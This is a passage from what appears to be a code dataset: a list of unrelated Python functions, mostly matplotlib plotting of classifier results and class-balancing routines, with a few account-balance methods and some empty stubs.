figsize=(16, 5), legend_y=None,\n label_rotation=0, y_label_pos=None, y_ticks=None, x_label_replacement_dict=None, feature_selection_specific=False):\n if x_label_replacement_dict is None:\n x_label_replacement_dict = {}\n\n if (len(results) == 1 or len(results) == 2) or legend_y is None:\n legend_y = -0.31\n\n if len(results) == 1 or len(results) == 2:\n y_label_pos = 0.5\n if len(results) < 4 and y_label_pos is None:\n y_label_pos = 0\n elif y_label_pos is None:\n y_label_pos = -0.4\n # Output a raw dump of results to file so that it can be used to tweak visualisation without re-executing experiment\n current_time = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n file_name = \"raw_dump_{0}.txt\".format(current_time)\n with open(os.path.dirname(os.path.realpath(__file__)) + \"/../results/\" + file_name, \"wb\") as output_file:\n output_file.write(str(results))\n patterns = (None, \"////\")\n\n colors = [\"#64B3DE\", \"#1f78b4\", \"#FBAC44\", \"#B9B914\", \"#bc1659\", \"#33a02c\", \"#6ABF20\", \"#ff7f00\", \"#6a3d9a\", \"#5a2add\", \"#b15928\", \"#e31a1c\", \"grey\"]\n classifier_arr = []\n for i in range(len(results)):\n classifier_arr.append(list())\n index = 0\n\n # Calculate difference in BACC from first entry as well as mean difference across classifiers\n for results_per_classifier in results:\n no_feature_selection = results[index][0][1]\n for i in range(len(no_feature_selection) + 1):\n classifier_arr[index].append(list())\n for i in range(1, len(results_per_classifier)):\n data_balancer_results = results_per_classifier[i][1]\n x = 0\n mean_classification = 0\n for result_tuple in data_balancer_results:\n value = result_tuple[0][2] - no_feature_selection[x][0][2]\n classifier_arr[index][x].append(value)\n mean_classification += value\n x += 1\n mean_classification /= float(len(data_balancer_results))\n classifier_arr[index][x].append(mean_classification)\n index += 1\n\n fig = plt.figure(figsize=figsize)\n\n classifiers = np.arange(len(classifier_arr[0]))\n\n bar_width = 0.2\n opacity = 0.9\n num_columns = 1 if len(results) == 1 else 2\n subplt_val = (100 * round(len(results) / 2.0)) + (10 * num_columns) + 1\n plt.subplots_adjust(hspace=0.42, wspace=0.1)\n ax1 = plt.subplot(subplt_val)\n\n for i in range(len(classifier_arr[0])):\n if i + 1 != len(classifier_arr[0]):\n label = results[0][0][1][i][1]\n else:\n label = \"Mean classification\"\n data_balancers = np.arange(len(classifier_arr[0][i])) * 3\n plt.bar(data_balancers + (i * bar_width), classifier_arr[0][i], bar_width,\n alpha=opacity,\n color=colors[i],\n hatch=patterns[i % len(patterns)],\n label=label)\n\n feature_selection_labels = [results[0][i][0] if results[0][i][0] not in x_label_replacement_dict else x_label_replacement_dict[results[0][i][0]] for i in range(1, len(results[0]))]\n if feature_selection_specific:\n feature_selection_labels = [feature_selection_labels[i - 1] + \"\\n{0}-{1:.1f}-{2}\".format(results[0][i][1][0][4][0], results[0][i][1][0][4][1], results[0][i][1][0][4][2]) for i in\n range(1, len(results[0]))]\n\n plt.xticks(data_balancers + (bar_width / 2) * len(classifiers), feature_selection_labels, rotation=label_rotation)\n bonus = \"\"\n if feature_selection_specific:\n bonus = \" ({0})\".format(results[0][0][1][0][4][3])\n plt.title(datasets[0].replace(\"_\", \" \") + bonus)\n plt.ylabel(\"Change in {0} from {1}\".format(parameter, difference_from), y=y_label_pos)\n\n vertical_plt = 0\n for z in range(1, len(results)):\n ax2 = plt.subplot(subplt_val + z, sharey=ax1)\n color = iter(cm.Set1(np.linspace(0, 1, len(no_feature_selection) + 1)))\n for i in range(len(classifier_arr[z])):\n if i + 1 != len(classifier_arr[z]):\n label = results[z][0][1][i][1]\n else:\n label = \"Mean classification\"\n data_balancers = np.arange(len(classifier_arr[z][i])) * 3\n plt.bar(data_balancers + (i * bar_width), classifier_arr[z][i], bar_width,\n alpha=opacity,\n color=colors[i],\n hatch=patterns[i % len(patterns)],\n label=label)\n\n feature_selection_labels = [results[0][i][0] if results[0][i][0] not in x_label_replacement_dict else x_label_replacement_dict[results[0][i][0]] for i in range(1, len(results[0]))]\n if feature_selection_specific:\n feature_selection_labels = [feature_selection_labels[i - 1] + \"\\n{0}-{1:.1f}-{2}\".format(results[z][i][1][0][4][0], results[z][i][1][0][4][1], results[z][i][1][0][4][2]) for i in\n range(1, len(results[0]))]\n\n plt.xticks(data_balancers + (bar_width / 2) * len(classifiers), feature_selection_labels, rotation=label_rotation)\n bonus = \"\"\n if feature_selection_specific:\n bonus = \" ({0})\".format(results[z][0][1][0][4][3])\n plt.title(datasets[z].replace(\"_\", \" \") + bonus)\n\n current_time = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n\n if len(results) >= 4:\n legend_x = -0.08\n elif len(results) == 1:\n legend_x = 0.5\n elif len(results) == 2:\n legend_x = 0\n else:\n legend_x = 1\n\n legend = plt.legend(loc='lower center', bbox_to_anchor=(legend_x, legend_y), fancybox=True, frameon=True, ncol=7)\n legend.get_frame().set_facecolor('#ffffff')\n\n if y_ticks is not None:\n plt.yticks(y_ticks)\n plt.ylim(ymin=y_ticks[0])\n plt.ylim(ymax=y_ticks[-1])\n\n x_label_x_pos = 0\n if len(results) == 1:\n x_label_x_pos = 0.5\n elif len(results) == 3:\n x_label_x_pos = 1\n plt.xlabel(x_label, x=x_label_x_pos, y=-2)\n feature_selection_labels = [results[0][i][0] for i in range(1, len(results[0]))]\n\n plt.locator_params(axis='y', nbins=15)\n name = \"{3}_results_per_classifier_plot{0}_{4}_{1}_{2}\".format(name_suffix, parameter, current_time, x_label, datasets)\n plt.savefig(os.path.dirname(os.path.realpath(__file__)) + \"/../results/{0}\".format(name.replace(\" \", \"_\")), bbox_extra_artists=(legend,), bbox_inches='tight')\n plt.close(fig)", "def plotpayoff(self):\n plt.figure()\n payoff = list(map(lambda x:max(x-self.s,0.0),self.pricetree[-1,:]))\n plt.plot(payoff)\n plt.title(\"Payoff Distribution\")\n plt.show()", "def plot(self):\n self.plotsite()\n self.plotbond()\n plt.show()", "def plot_prediction(self, img, probs, classes):\n\n # Convert results to dataframe for plotting\n result = pd.DataFrame({\"p\": probs}, index=classes)\n\n # Show the image\n fig = plt.figure(figsize=(16, 5))\n ax = plt.subplot(1, 2, 1)\n ax.imshow(img)\n\n # Set title to be the actual class\n ax.set_title(\"\", size=20)\n\n ax = plt.subplot(1, 2, 2)\n # Plot a bar plot of predictions\n result.sort_values(\"p\")[\"p\"].plot.barh(color=\"blue\", edgecolor=\"k\", ax=ax)\n plt.xlabel(\"Predicted Probability\")\n plt.tight_layout()\n\n return fig", "def visclassifier(fun,xTr,yTr):\n\n yTr = np.array(yTr).flatten()\n \n symbols = [\"ko\",\"kx\"]\n marker_symbols = ['o', 'x']\n mycolors = [[0.5, 0.5, 1], [1, 0.5, 0.5]]\n classvals = np.unique(yTr)\n\n plt.figure()\n\n res=300\n xrange = np.linspace(min(xTr[:, 0]), max(xTr[:, 0]),res)\n yrange = np.linspace(min(xTr[:, 1]), max(xTr[:, 1]),res)\n pixelX = repmat(xrange, res, 1)\n pixelY = repmat(yrange, res, 1).T\n\n xTe = np.array([pixelX.flatten(), pixelY.flatten()]).T\n\n testpreds = fun(xTe)\n Z = testpreds.reshape(res, res)\n # Z[0,0] = 1 # optional: scale the colors correctly\n plt.contourf(pixelX, pixelY, np.sign(Z), colors=mycolors)\n\n for idx, c in enumerate(classvals):\n plt.scatter(xTr[yTr == c,0],\n xTr[yTr == c,1],\n marker=marker_symbols[idx],\n color='k'\n )\n\n plt.axis('tight')\n plt.show()", "def dif_plot(sp, x, y, seqmin, seqmax):\n sp.bar(x, y, color='gray')\n sp.set_xlim(seqmin, seqmax)\n sp.xaxis.set_major_locator(MaxNLocator(15))\n sp.set_xlabel('Residue')\n sp.set_ylabel('Difference')\n sp.grid(False)\n sp.axhline(y=0, linewidth=1, color='black')", "def plot_graph(self) -> None:", "def plot_sum(self):\n fig, ax = plt.subplots()\n ax.set_title(\"Unpolarized intensity: I_up + I_down\")\n ax.set_xlabel(\"Time (microseconds)\")\n ax.set_ylabel('Intensity')\n\n if (self.is_attribute(\"time\") & self.is_attribute(\"intensity_up\") & \n self.is_attribute(\"intensity_up_sigma\") &\n self.is_attribute(\"intensity_down\") & \n self.is_attribute(\"intensity_down_sigma\") &\n self.is_attribute(\"intensity_up_total\") &\n self.is_attribute(\"intensity_down_total\")):\n np_excl = numpy.array(self.excluded, dtype=bool)\n np_notexcl = numpy.logical_not(np_excl)\n np_time = numpy.array(self.time, dtype=float)\n np_up = numpy.array(self.intensity_up, dtype=float)\n np_sup = numpy.array(self.intensity_up_sigma, dtype=float)\n np_up_mod = numpy.array(self.intensity_up_total, dtype=float)\n np_down = numpy.array(self.intensity_down, dtype=float)\n np_sdown = numpy.array(self.intensity_down_sigma, dtype=float)\n np_down_mod = numpy.array(self.intensity_down_total, dtype=float)\n np_sum = np_up + np_down\n np_sum_mod = np_up_mod + np_down_mod\n np_ssum = numpy.sqrt(numpy.square(np_sup)+numpy.square(np_sdown))\n ax.plot(np_time, np_sum_mod, \"k-\", label=\"model\")\n ax.errorbar(np_time[np_notexcl], np_sum[np_notexcl], yerr=np_ssum[np_notexcl], fmt=\"ko\", alpha=0.2, label=\"experiment\")\n ax.errorbar(np_time[np_excl], np_sum[np_excl], yerr=np_ssum[np_excl], fmt=\"rs\", alpha=0.2, label=\"excluded\")\n\n y_min_d, y_max_d = ax.get_ylim()\n param = y_min_d-(np_sum - np_sum_mod).max()\n coeff = np_notexcl.astype(int)\n\n ax.plot([np_time.min(), np_time.max()], [param, param], \"k:\")\n ax.plot(np_time, coeff*(np_sum - np_sum_mod)+param, \"r-\", alpha=0.7,\n label=\"difference\")\n elif (self.is_attribute(\"time\") & self.is_attribute(\"intensity\") & \n self.is_attribute(\"intensity_total\") &\n self.is_attribute(\"intensity_sigma\")):\n np_excl = numpy.array(self.excluded, dtype=bool)\n np_notexcl = numpy.logical_not(np_excl)\n np_time = numpy.array(self.time, dtype=float)\n np_sum = numpy.array(self.intensity, dtype=float)\n np_sum_mod = numpy.array(self.intensity_total, dtype=float)\n np_ssum = numpy.array(self.intensity_sigma, dtype=float)\n ax.plot(np_time, np_sum_mod, \"k-\", label=\"model\")\n ax.errorbar(np_time[np_notexcl], np_sum[np_notexcl], yerr=np_ssum[np_notexcl], fmt=\"ko\", alpha=0.2, label=\"experiment\")\n ax.errorbar(np_time[np_excl], np_sum[np_excl], yerr=np_ssum[np_excl], fmt=\"rs\", alpha=0.2, label=\"excluded\")\n\n y_min_d, y_max_d = ax.get_ylim()\n param = y_min_d-(np_sum - np_sum_mod).max()\n coeff = np_notexcl.astype(int)\n\n ax.plot([np_time.min(), np_time.max()], [param, param], \"k:\")\n ax.plot(np_time, coeff*(np_sum - np_sum_mod)+param, \"r-\", alpha=0.7,\n label=\"difference\")\n ax.legend(loc='upper right')\n fig.tight_layout()\n return (fig, ax)", "def learning_viz(self) :\n self.train\n history = self.history\n plot_loss(history)", "def balance_classes(df):\n df_class_0 = df[df[65]==0]\n df_class_1 = df[df[65]==1]\n df_count = df[65].value_counts()\n count_0 = df_count[0]\n count_1 = df_count[1]\n\n if count_0 > count_1:\n df_class_1_over = df_class_1.sample(count_0, replace=True)\n df_over = pd.concat([df_class_0, df_class_1_over], axis=0)\n elif count_0 < count_1:\n df_class_0_over = df_class_0.sample(count_1, replace=True)\n df_over = pd.concat([df_class_1, df_class_0_over], axis=0)\n else:\n df_over = df\n \n return df_over", "def plotSVMProfile(self, df_class=None, is_plot=True, **kwargs):\n # Use getimportance for each class and each clf to get average\n # importance value for each feature\n # Construct importance dataframes by class\n COLORS = [\"blue\", \"red\", \"green\", \"brown\"]\n if df_class is None:\n dfs = [self.makeImportanceDF(class_selection=c) for c in self.classes]\n else:\n dfs = []\n for cls in df_class.index:\n ser_X = df_class.loc[cls, :]\n # Accumulate the feature contribution for each classifier\n # over the class averaged values\n sers = [self.clf_desc.getFeatureContributions(\n c, self.columns, ser_X).loc[cls, :] for c in self.clfs]\n df_values = pd.concat(sers, axis=1)\n df = self._makeFeatureDF(df_values)\n dfs.append(df)\n ymin = 0.9*min([df.values.flatten().min() for df in dfs])\n ymax = 1.1*max([df.values.flatten().max() for df in dfs])\n ylim = [ymin, ymax]\n fig, axes = plt.subplots(1, len(dfs))\n is_first = True\n for cls, ax, df in zip(self.classes, axes, dfs):\n df_new = df.sort_index(ascending=False)\n self._plot(df_new, None, fig, ax, False, is_vertical=False,\n is_ygrid=False, color=COLORS,\n ylim=ylim, **kwargs)\n ax.plot([0, 0], [0, len(df)])\n if is_first:\n is_first = False\n else:\n ax.set_ylabel(\"\")\n ax.set_yticklabels([])\n if self._class_names is not None:\n title = self._class_names[cls]\n else:\n title = str(cls)\n ax.set_title(title)\n if is_plot:\n plt.show()", "def decisionBoundary(root, figure, fileName):\n stepValue = 0.001\n classClassification = [1, 2, 3, 4]\n colorClassification = ['b', 'g', 'r', 'm']\n markerClassification = ['x', '+', '*', 'o']\n classesList = [\"Bolts\", \"Nuts\", \"Rings\", \"Scraps\"]\n decisionPlot = figure.add_subplot(111)\n attributeValues, classes, _ = readData(fileName)\n attributeValues = np.array(attributeValues)\n classes = np.array(classes)\n \n \n\n attribute1, attribute2 = np.meshgrid(np.arange(0, 1, stepValue), np.arange(0, 1, stepValue))\n\n predicted_class = []\n for i in range(attribute1.shape[0]):\n predicted_class.append([])\n for j in range(attribute1.shape[1]):\n result = [attribute1[i][j], attribute2[i][j]]\n predicted_value = classify(np.array(result), root)\n predicted_class[i].append(predicted_value)\n\n decisionPlot.contourf(attribute1, attribute2, np.array(predicted_class))\n\n for a in classClassification:\n attribute1=[]\n attribute2=[]\n \n for j in range(len(attributeValues[:])):\n \n if classes[j]==a:\n attribute1 +=[attributeValues[j][0]]\n for k in range(len(attributeValues[:])):\n if classes[k]==a:\n attribute2 +=[attributeValues[k][1]]\n \n \n decisionPlot.scatter(attribute1, attribute2, color=colorClassification[a - 1], marker=markerClassification[a - 1]\n , label=classesList[a - 1], s=100)\n\n decisionPlot.legend(loc='upper right')\n decisionPlot.set_xlabel(\"Six fold Rotational Symmetry\")\n decisionPlot.set_ylabel(\"Eccentricity\")\n decisionPlot.set_title(\"Decision boundary\")\n return decisionPlot", "def __init__(self):\n self.balance = 0", "def show_balance(cls):\n if cls.is_logged_in():\n print(f'\\nBalance: {cls.__current_acct.__get_balance()}\\n')", "def acc_loss_graph(self):\n acc = self.history['accuracy']\n val_acc = self.history['val_accuracy']\n loss = self.history['loss']\n val_loss = self.history['val_loss']\n plt.figure(figsize=(15, 5))\n plt.subplot(1, 2, 1)\n plt.plot(acc, label='Train')\n plt.plot(val_acc, label='Val')\n plt.legend(loc='lower right')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.ylim([min(plt.ylim()), 1])\n plt.title('Accuracy')\n\n plt.subplot(1, 2, 2)\n plt.plot(loss, label='Train')\n plt.plot(val_loss, label='Val')\n plt.legend(loc='lower right')\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.ylim([0, max(plt.ylim())])\n plt.title('Loss')\n plt.show();", "def balance_set(X, Y, adr_labels_size, nonadr_labels_size):\n\n print(\"Performing Class Balancing...\")\n adr_samples_needed = nonadr_labels_size - adr_labels_size\n new_X = []\n new_Y = []\n adr_labels_size = 0\n nonadr_labels_size = 0\n\n for index, example in enumerate(X):\n if adr_samples_needed > 0:\n if Y[index] == ADR_MENTION_CLASS_LABEL:\n new_X.append(example) # add original 'ADR' sample\n new_Y.append(ADR_MENTION_CLASS_LABEL)\n new_X.append(example) # add duplicate 'ADR' sample to perform Over-Sampling\n new_Y.append(ADR_MENTION_CLASS_LABEL)\n\n adr_labels_size += 2\n adr_samples_needed -= 1\n else:\n # we don't add original 'No ADR Mention' sample to perform Under-Sampling\n adr_samples_needed -= 1\n\n else:\n if Y[index] == ADR_MENTION_CLASS_LABEL:\n adr_labels_size += 1\n else:\n nonadr_labels_size += 1\n\n new_X.append(example) # add original sample\n new_Y.append(Y[index]) # add original label\n\n print(\" Updated dataset size: {}\".format(len(new_X)))\n print(\" {} class size: {}\".format(ADR_MENTION_CLASS_NAME, adr_labels_size))\n print(\" {} class size: {}\".format(NON_ADR_MENTION_CLASS_NAME, nonadr_labels_size))\n\n return new_X, new_Y", "def show_balance(self):\n\t\tbalance = 0\n\t\tfor acct in self.wallet:\n\t\t\tutxos = get_unspent(acct[\"address\"], self.testnet)\n\t\t\tbalance += sum(i['value'] for i in utxos)\n\t\treturn f\"{self.name} current balance: {str(balance/100000000.0)} BTC\"", "def plot(self):\n pass", "def balance_classes(data, labels):\n\n index_dict = {}\n\n for idx, label in enumerate(labels):\n if label not in index_dict:\n index_dict[label] = [idx]\n else:\n index_dict[label] += [idx]\n\n index_list = list(index_dict.values())\n\n min_balanced_number = min([len(l) for l in index_list])\n\n index_to_take_list = np.concatenate([\n np.random.choice(l, min_balanced_number, replace=False)\n for l in index_list\n ])\n\n np.random.shuffle(index_to_take_list)\n\n return data[index_to_take_list], labels[index_to_take_list]", "def plot_class_distribution(data):\n classes = [r[0] for r in data]\n plt.hist(classes)\n plt.xlabel('Labels')\n plt.ylabel('Counts')\n plt.title('Histogram of class counts')\n plt.show()", "def plot_class_scatter(rows_of_class, class_name, max_value, min_value):\n fig = plt.figure(figsize=(30, 5))\n fig.suptitle(\"Components for class {}\".format(class_name))\n function_to_channel_plots = {function_name: [] for function_name in [\"Mean\", \"Min\", \"Max\"]}\n n_plots = 1\n # For each function\n for function_idx, function_name in enumerate(function_to_channel_plots):\n # For each channel\n for channel_idx in range(0, 4):\n plot = fig.add_subplot(1, 14, n_plots + function_idx)\n channel_number = ((n_plots - 1) % 4) + 1\n plot.set_title(\"{} of Channel {}\".format(function_name, channel_number))\n plot.set_xlabel(\"Components\")\n # Only need title for first graph for each function\n if channel_idx == 0:\n plot.set_ylabel(\"{} of 100 pulses\".format(function_name))\n\n plot.set_ylim((min_value, max_value))\n function_to_channel_plots[function_name].append(plot)\n n_plots += 1\n\n components_per_function = 256\n components_per_channel = 64\n for index, row in rows_of_class.iterrows():\n for function_idx, (function, channel_plots) in enumerate(function_to_channel_plots.items()):\n for channel_idx, channel_plot in enumerate(channel_plots):\n x = np.arange(0, components_per_channel)\n start = (function_idx * components_per_function) + (channel_idx * components_per_channel)\n end = start + components_per_channel\n y = row[start:end]\n channel_plot.scatter(x, y, alpha=0.8)\n\n plt.savefig(\"{}.png\".format(class_name))", "def draw_bonus_loss(loss):\n f, ax = plt.subplots()\n vertices = np.arange(10, 50)\n ax.plot(vertices, loss[10:], 'b', label='Loss')\n plt.xlabel('Rounds')\n plt.ylabel('Hinge Loss')\n plt.title('Hinge Loss: l = 10, m = 20, n = 40')\n plt.legend(loc='upper left')\n plt.grid(True)\n plt.show()", "def show_balances(self):\n print 'Pot: %d' % (self.account.balance,)\n for player in self.players:\n balance = player.account.balance\n if balance > 0:\n print '%s: %d' % (player, balance,)", "def produce_cgchart(ytrue, ypred):\n\n yprobas = np.append((1-ypred).reshape(-1,1), ypred.reshape(-1,1), axis=1)\n # 0's and 1's\n print(yprobas.shape)\n areas = plot_cumulative_gain(ytrue, yprobas)", "def compute_random_baseline(self, classes):\n\n # based on the class distribution of the data\n sum_benefit = 0\n\n # c is the actual label\n # if the label in y is unseen when training, skip it, don't include it in the error\n for i, c in enumerate(self.y_chunk):\n for j, cprime in enumerate(classes):\n\n # (1) compute the benefit matrix\n benefit_c_cprime = 0\n if cprime == self.fraud_label:\n benefit_c_cprime = self.X_chunk[i][-1] - self.cost if c == self.fraud_label else -self.cost\n\n # (2) get the probability\n probab_ic = 1 / len(classes)\n sum_benefit += probab_ic * benefit_c_cprime\n\n return sum_benefit", "def plot_results(self):\n [m, s] = self.run_model()\n barM = m.x[2:8]\n barS = s.x[2:8]\n T1vec = self.T1_extraction(self.subj)\n for i in T1vec:\n T1vec[T1vec == i] = int(i)\n T1vec = T1vec[2:8]\n barWidth = 25\n r2 = [x + barWidth for x in T1vec]\n plt.grid(b=True, linewidth=0.2)\n plt.bar(\n T1vec, barM, color=\"b\", width=barWidth, edgecolor=\"white\", label=\"Motor\"\n )\n plt.bar(r2, barS, color=\"r\", width=barWidth, edgecolor=\"white\", label=\"Sensory\")\n plt.xlabel(\"T1\", fontweight=\"bold\")\n plt.ylabel(\"Partial contribution\", fontweight=\"bold\")\n plt.legend()\n plt.title(\n \"Partial contribution of cortical layers to motor and sensory operations\"\n )\n plt.show()\n return barM, barS, T1vec", "def transaction_plot(ds):\n import seaborn as sns\n import pandas as pd\n df = pd.DataFrame()", "def _plot(self, step, rewards, losses):\n plt.figure(figsize=(20, 5))\n plt.subplot(131)\n plt.title('Total Episode Reward')\n plt.plot(rewards)\n plt.subplot(132)\n plt.title('MSE Loss')\n plt.plot(losses)\n plt.show()", "def distance_plot(self, classified_lines):\n for regions, labels in classified_lines:\n for region, label in zip(regions, labels):\n start = self.attacker_position(region[0])\n end = self.attacker_position(region[1])\n plt.plot([start[0], end[0]], [start[1], end[1]],\n color=self.color(int(label)))", "def plot(self, weight_average=False):\n if(len(self.X)==0 or len(self.T)==0):\n print(\"Nothing to plot...\")\n x = np.array(self.X)\n for i in range(0,x.shape[1]):\n plt.plot(self.T,x[:,i,0])\n if(weight_average):\n w_i = np.zeros(self.size)\n s = sum(np.array(self.graph.degree)[:,1])\n x = self.x_init\n for i in nx.nodes(self.graph):\n w_i[i] = self.graph.degree(i)/s\n x[i] = x[i]*w_i[i]\n plt.plot(np.linspace(0,self.T[-1],10),np.zeros(10)+sum(x), label=\"Connected graph consensus: \"+str(sum(x)),color='red',marker='s')\n else:\n plt.plot(np.linspace(0,self.T[-1],10),np.zeros(10)+np.mean(self.x_init), label=\"Connected graph consensus: \"+str(round(np.mean(self.x_init),3)),color='red',marker='s')\n plt.grid()\n plt.xlabel(\"Time (seconds)\")\n plt.ylabel(\"State\")\n plt.title(\"Convergence of consensus algorithm\")\n plt.legend()", "def activityPlot(act):\n # Plot 1 is simple stacked bar\n plt.figure(figsize=(9,4), dpi=100)\n ax1 = plt.subplot(1,2,1)\n labels = [gr for gr in act.keys()]\n poses = [i+.5 for i in range(len(labels))]\n # b_means, b_stds, t_means, t_stds, s_means, s_stds = [], [], [], [], [], []\n stat = {'b_means': [], 'b_stds': [], 't_means': [], 't_stds': [],'s_means': [], 's_stds': []}\n grkey = {'b_means': 'burst', 'b_stds': 'burst', 't_means': 'tonic', 't_stds': 'tonic','s_means': 'silent', 's_stds': 'silent'}\n fnkey = {'b_means': np.mean, 'b_stds': np.std, 't_means': np.mean, 't_stds': np.std,'s_means': np.mean, 's_stds': np.std}\n \n \n for gr in labels:\n for k in stat.keys():\n try:\n temp_ = fnkey[k](act[gr][grkey[k]])\n if str(temp_) == 'nan':\n stat[k].append(0.)\n else:\n stat[k].append(temp_)\n except:\n stat[k].append(0.)\n \n p_b = ax1.bar(poses, stat['b_means'], color='blue', alpha=0.6, \n yerr=stat['b_stds'], edgecolor='white')\n p_t = ax1.bar(poses, stat['t_means'], bottom=stat['b_means'], color='red', alpha=0.6, \n yerr=stat['t_stds'], edgecolor='white')\n p_s = ax1.bar(poses, stat['s_means'], bottom=[stat['b_means'][i]+\\\n stat['t_means'][i] for i in range(len(stat['b_means']))],\n color='purple', alpha=0.6, yerr=stat['s_stds'],\n edgecolor='white')\n # Cosmetics\n plt.xticks(poses, labels, rotation=30)\n plt.legend((p_b[0], p_t[0], p_s[0]), ('Burst', 'Tonic', 'Silent'))\n \n # Plot 2 is complex\n # ax2 = plt.subplot2grid((1,3), (0,1), colspan=2)\n ax2 = plt.subplot(1,2,2)\n for gr in range(len(labels)):\n ax2.plot(np.random.normal(loc=poses[gr], scale=.1, size=len(act[labels[gr]]['burstLoc'])), \n act[labels[gr]]['burstLoc'], 'o', color='blue', alpha=0.6,\n markeredgecolor='none')\n ax2.plot(np.random.normal(loc=poses[gr], scale=.1, size=len(act[labels[gr]]['tonicLoc'])), \n act[labels[gr]]['tonicLoc'], 'o', color='red', alpha=0.6,\n markeredgecolor='none')\n \n # Cosmetics\n plt.xticks(poses, labels, rotation=30)\n print(stat)\n plt.show()\n return", "def plot_misclass(train, test):\n plt.figure(figsize=(12, 10))\n ptrain, = plt.plot(train, label='Train Misclassification')\n ptest, = plt.plot(test, label='Test Misclassification')\n plt.legend(handles=[ptrain, ptest], fontsize=14)\n plt.title('Training vs Test Misclassification', fontsize=16)\n plt.ylabel('Misclassification', fontsize=14)\n plt.xlabel('Iteration', fontsize=14)\n plt.show()", "def draw_num_classes_graphs():\n values = [10, 50, 100, 250, 1000, 4000]\n for num_classes in values:\n print(\"Training model on {} most common classes.\".format(num_classes))\n model = create_pretrained_model(num_classes=num_classes)\n histories = train(model, num_classes, epochs=50)\n run_name = get_run_name(\"{}classes\".format(num_classes))\n save_learning_curves(histories, run_name)\n csv_path = os.path.join(\"plots/\", run_name, \"data.csv\")\n ut.write_csv_dict(histories,\n keys=['loss', 'acc', 'val_loss', 'val_acc'],\n filename=csv_path)", "def returnBalances(self):\n pass", "def plot_probability_distribution(\n y_true, y_pred_proba, threshold, class_labels=[0, 1]):\n\n _y = pd.concat([y_true, y_pred_proba], axis=1)\n\n sns.kdeplot(\n _y[_y.iloc[:, 0] == 1].iloc[:, 1],\n shade=True, label=class_labels[1], linewidth=3, alpha=0.7)\n sns.kdeplot(\n _y[_y.iloc[:, 0] == 0].iloc[:, 1],\n shade=True, label=class_labels[0], linewidth=3, alpha=0.7)\n\n plt.plot( # threshold line\n [threshold, threshold],\n [plt.ylim()[0], plt.ylim()[1]],\n 'r--', linewidth=3,\n alpha=0.3, label='threshold={}'.format(threshold))\n\n plt.xlim(0, 1)\n plt.title(\"Class probability distribution\")\n plt.xlabel('Probability')\n plt.ylabel('Density')\n plt.legend(loc='upper center')\n score = accuracy_score(y_true, y_pred_proba, threshold)\n plt.text(\n 0.05, 0.2,\n \"Score={:.3f}\".format(score),\n bbox=dict(boxstyle=\"round\", fc=\"w\", ec=\"0.5\", alpha=0.9))", "def balance_classes(self, classids):\n \n # Get ROI class counts for each sample patch:\n samples = self.SampleID\n counts = self.count_classes(samples)\n counts = counts[:, classids]\n totalcount = np.sum(counts, axis=0)\n \n # Find the class with minimum and maximum total count:\n c_min = np.argmin(totalcount)\n c_max = np.argmax(totalcount)\n \n # Class balancing is performed as long as the min-max class ratio is \n # not within 50%.\n #\n # Balancing Algorithm:\n # * Randomly sample from samples with non-zero min-class ROI counts \n # and zero maximum class ROIs.\n # * Simulaneously, randomly sample a subset of max-class only samples \n # to be removed from the dataset. This levels the field from both \n # directions.\n class_ratio = totalcount[c_min] / totalcount[c_max]\n while (class_ratio < 0.5) & (len(samples) < 3*5000):\n # Find samples with maximum min-max class ratio:\n N = np.sum((counts[:,c_min] > 0) & (counts[:,c_max] == 0))\n M = int(0.5*N)\n \n # Min-class samples to add:\n min_sample = np.nonzero((counts[:,c_min]>0) & (counts[:,c_max]==0))\n min_sample = min_sample[0] # Unfold tuple\n min_sample = min_sample[np.random.randint(0, len(min_sample)-1, N)]\n \n # Max-class samples to remove:\n max_sample = np.nonzero((counts[:,c_min]==0) & (counts[:,c_max]>0))\n max_sample = max_sample[0] # Unfold tuple\n max_sample = max_sample[np.random.randint(0, len(max_sample)-1, M)]\n max_sample = np.unique(max_sample)\n \n # Construct new sample set:\n min_sample = samples[min_sample]\n samples = np.append(np.delete(samples, max_sample), min_sample)\n \n # Recompute total count and min-max class ratio:\n counts = self.count_classes(samples)[:, classids]\n totalcount = np.sum(counts, axis=0)\n c_min = np.argmin(totalcount)\n c_max = np.argmax(totalcount)\n class_ratio = totalcount[c_min] / totalcount[c_max]\n \n # Done, balanced, update samples:\n balancedset = self.Samples[samples,:]\n self._set_sampling_scheme_(balancedset)", "def test_pandas_occupancy_balance(self):\n data = load_occupancy(return_dataset=True)\n X, y = data.to_pandas()\n\n # Create and fit the visualizer\n oz = ClassBalance()\n assert oz.fit(y) is oz\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def plot_decision_regions(self, option, canvas):\n\t\tle = preprocessing.LabelEncoder()\t\t# integer encoder\n\t\tle.fit(self.y)\n\t\tclassifier = self.classifier.fit(self.X, le.transform(self.y))\n\t\tclasses = classifier.classes_\n\t\tnum_classes = len(classes)\n\n\t\tif option == 'train':\n\t\t\tX = self.X\n\t\t\ty = self.y\n\t\telif option == 'test':\n\t\t\tX = self.test_X\n\t\t\ty = self.test_y\n\n\t\tb1 = self.X.iloc[:, 0]\n\t\tb2 = self.X.iloc[:, 1]\n\t\tb1_slack = (b1.max() - b1.min()) * 0.1\n\t\tb2_slack = (b2.max() - b2.min()) * 0.1\n\t\tb1_min, b1_max = b1.min() - b1_slack, b1.max() + b1_slack \t# x-axis range\n\t\tb2_min, b2_max = b2.min() - b2_slack, b2.max() + b2_slack\t# y-axis range\n\t\tstep_1 = (b1_max - b1_min) / 200\n\t\tstep_2 = (b2_max - b2_min) / 200\n\t\tmd1, md2 = np.meshgrid(np.arange(b1_min, b1_max, step_1), np.arange(b2_min, b2_max, step_2))\n\n\t\trcParams.update({'font.size': 7})\n\t\tcanvas.figure.clear()\n\t\tax = canvas.figure.subplots()\n\t\tlevels = np.arange(-0.19, 1, 0.2) + 0.2\n\n\t\tif num_classes == 2:\n\t\t\tcm_bkgd = plt.cm.RdBu\n\t\t\tcm_pts = ListedColormap(['#FF0000', '#0000FF'])\n\t\t\tZ = classifier.predict_proba(np.c_[md1.ravel(), md2.ravel()])[:, 1]\n\t\t\tZ = Z.reshape(md1.shape)\n\t\t\tax.contourf(md1, md2, Z, vmin=0, vmax=1, cmap=cm_bkgd, alpha=0.8)\n\n\t\telif num_classes == 3:\n\t\t\tcm_bkgd_1 = plt.cm.Reds\n\t\t\tcm_bkgd_2 = plt.cm.Greens\n\t\t\tcm_bkgd_3 = 